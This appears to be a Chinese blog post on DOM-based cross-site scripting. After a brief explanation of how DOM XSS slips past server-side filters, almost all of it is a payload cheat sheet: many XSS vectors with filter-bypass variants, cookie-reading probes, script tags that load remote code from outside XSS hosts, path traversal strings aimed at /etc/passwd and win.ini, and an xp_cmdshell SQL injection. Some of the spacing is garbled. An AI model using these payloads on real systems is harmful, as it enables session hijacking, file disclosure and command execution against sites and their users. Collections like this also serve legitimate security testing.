XSS (DOM
靶场搭建可用蓝易云服务器
😘😘😘😘😘😘点击查看详情
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。
客户端JavaScript可以访问浏览器的DOM文本对象模型是利用的前提,当确认客户端代码中有DOM型XSS漏洞 时,并且能诱使(钓鱼)一名用户访问自己构造的URL,就说明可以在受害者的客户端注入恶意脚本。利用步骤和反射型很类似,但是唯一的区别就是,构造的URL参数不用发送到服务器端,可以达到绕过WAF、躲避服务端的检测效果。
XSS攻击代码
1 '"()&%
' > < script> alert ( document. cookie) < / script>
= '>
%3Cscript%3Ealert(' XSS ')%3C/script%3E
XSS ')">
%0a%0a.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
a.jsp/
a?
">
' ; exec% 20 master. . xp_cmdshell% 20 'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt' -- &&
% 22 % 3 E% 3 Cscript% 3 Ealert( document. cookie) % 3 C/ script% 3 E
% 3 Cscript% 3 Ealert( document. domain) ; % 3 C/ script% 3 E&
% 3 Cscript% 3 Ealert( document. domain) ; % 3 C/ script% 3 E& SESSION_ID = { SESSION_ID } & SESSION_ID =
< IMG src= "javascript:alert('XSS');" >
< IMG src= javascript: alert ( 'XSS' ) >
< IMG src= JaVaScRiPt: alert ( 'XSS' ) >
< IMG src= JaVaScRiPt: alert ( "XSS" ) >
< IMG src= javascript: alert ( 'XSS' ) >
< IMG src= javascript: alert ( 'XSS' ) >
< IMG src= javascript: alert ( 'XSS' ) >
< IMG src= "jav ascript:alert('XSS');" >
< IMG src= "jav ascript:alert('XSS');" >
< IMG src= "jav ascript:alert('XSS');" >
" " ; ' > out
XSS ');">
XSS ')">
XSS ')>
XSS ')">
XSS ')">
XSS ');">
XSS ')}">
XSS ');">
XSS ');">
XSS ')>
XSS')">
XSS
'))">
:
< DIV STYLE = "width: expression(alert('XSS'));" >
< STYLE > @im\port
'\ja\vasc\ript:alert("XSS")' ; < / STYLE >
< IMG STYLE = 'xss:expre\ssion(alert("XSS"))' >
< STYLE TYPE = "text/javascript" > alert ( 'XSS' ) ; < / STYLE >
< STYLE TYPE = "text/css" > . XSS { background
- image
: url ( "javascript:alert('XSS')" ) ; } < / STYLE > < A class = "XSS" > < / A >
< STYLE type
= "text/css" > BODY { background
: url ( "javascript:alert('XSS')" ) } < / STYLE >
< BASE href
= "javascript:alert('XSS');//" >
getURL ( "javascript:alert('XSS')" )
a
= "get" ; b
= "URL" ; c
= "javascript:" ; d
= "alert('XSS');" ; eval ( a
+ b
+ c
+ d
) ;
< XML src
= "javascript:alert('XSS');" >
"> <"
< SCRIPT src
= "http://xss.ha.ckers.org/xss.jpg" > < / SCRIPT >
< IMG src
= "javascript:alert('XSS')"
< ! -- "-->
:
< SCRIPT a
= ">" src
= "http://xss.ha.ckers.org/a.js" > < / SCRIPT >
< SCRIPT = ">" src
= "http://xss.ha.ckers.org/a.js" > < / SCRIPT >
< SCRIPT a
= ">" '' src
= "http://xss.ha.ckers.org/a.js" > < / SCRIPT >
< SCRIPT "a='>'" src
= "http://xss.ha.ckers.org/a.js" > < / SCRIPT >
< SCRIPT > document
. write ( ") ; < / SCRIPT > PT src= "http://xss.ha.ckers.org/a.js" > < / SCRIPT >
< A href= http:
< IMG SRC = javascript: alert ( ‘XSS ’) >
< IMG SRC =
< IMG SRC = / onerror= ”alert ( String . fromCharCode ( 88 , 83 , 83 ) ) ”> < / img>
< img src= x onerror= ”&
< IMG SRC = &
&
< IMG SRC = &
< IMG SRC = ”jav ascript: alert ( ‘XSS ’) ; ”>
< IMG SRC = ”jav&
< IMG SRC = ” &
<< SCRIPT > alert ( “XSS ”) ;
< IMG SRC = ”javascript: alert ( ‘XSS ’) ”
< / script> < script> alert ( ‘XSS ’) ; < / script>
< INPUT TYPE = ”IMAGE ” SRC = ”javascript: alert ( ‘XSS ’) ; ”>
< BODY BACKGROUND = ”javascript: alert ( ‘XSS ’) ”>
< svg/ onload= alert ( 'XSS' ) >
< IMG SRC = ’vbscript: msgbox ( “XSS ”) ’>
< BGSOUND SRC = "javascript:alert('XSS');" >
< BR SIZE = "&{alert('XSS')}" >
< LINK REL = "stylesheet" HREF = "javascript:alert('XSS');" >
< STYLE > @im\port'\ja\vasc\ript:alert("XSS")' ; < / STYLE >
< IMG STYLE = "xss:expr/*XSS*/ession(alert('XSS'))" >
< STYLE > . XSS { background- image: url ( "javascript:alert('XSS')" ) ; } < / STYLE > < A CLASS = XSS > < / A >
< STYLE type= "text/css" > BODY { background: url ( "javascript:alert('XSS')" ) } < / STYLE >
< XSS STYLE = "behavior: url(xss.htc);" >
< IFRAME SRC = "javascript:alert('XSS');" > < / IFRAME >
< FRAMESET > < FRAME SRC = "javascript:alert('XSS');" > < / FRAMESET >
< TABLE > < TD BACKGROUND = "javascript:alert('XSS')" >
< DIV STYLE = "width: expression(alert('XSS'));" >
< SCRIPT a= ">" SRC = "httx://xss.rocks/xss.js" > < / SCRIPT >
< script> alert ( / xss/ ) < / script>
< svg onload= alert ( document. domain) >
< img src= document. domain onerror= alert ( document. domain) >
< M onmouseover= alert ( document. domain) > M
< marquee onscroll= alert ( document. domain) >
< a href= javascript: alert ( document. domain) > M < / a>
< body onload= alert ( document. domain) >
< details open ontoggle= alert ( document. domain) >
< embed src= javascript: alert ( document. domain) >
< script> alert ( 1 ) < / script>
< sCrIpT> alert ( 1 ) < / sCrIpT>
< ScRiPt> alert ( 1 ) < / ScRiPt>
< sCrIpT> alert ( 1 ) < / ScRiPt>
< ScRiPt> alert ( 1 ) < / sCrIpT>
< img src= 1 onerror= alert ( 1 ) >
< iMg src= 1 oNeRrOr= alert ( 1 ) >
< ImG src= 1 OnErRoR= alert ( 1 ) >
< img src= 1 onerror= "alert("M")" >
< marquee onscroll= alert ( 1 ) >
< mArQuEe OnScRoLl= alert ( 1 ) >
< MaRqUeE oNsCrOlL= alert ( 1 ) >
< a href= javascript: / 0 / , alert ( % 22 M% 22 ) > M < / a>
< a href= javascript: / 00 / , alert ( % 22 M% 22 ) > M < / a>
< a href= javascript: / 000 / , alert ( % 22 M% 22 ) > M < / a>
< a href= javascript: / M / , alert ( % 22 M% 22 ) > M < / a>
< base href= javascript: / M / > < a href= , alert ( 1 ) > M < / a>
< base href= javascript: / M / > < iframe src= , alert ( 1 ) > < / iframe>
< / textarea> < script> var a= 1
"> .gif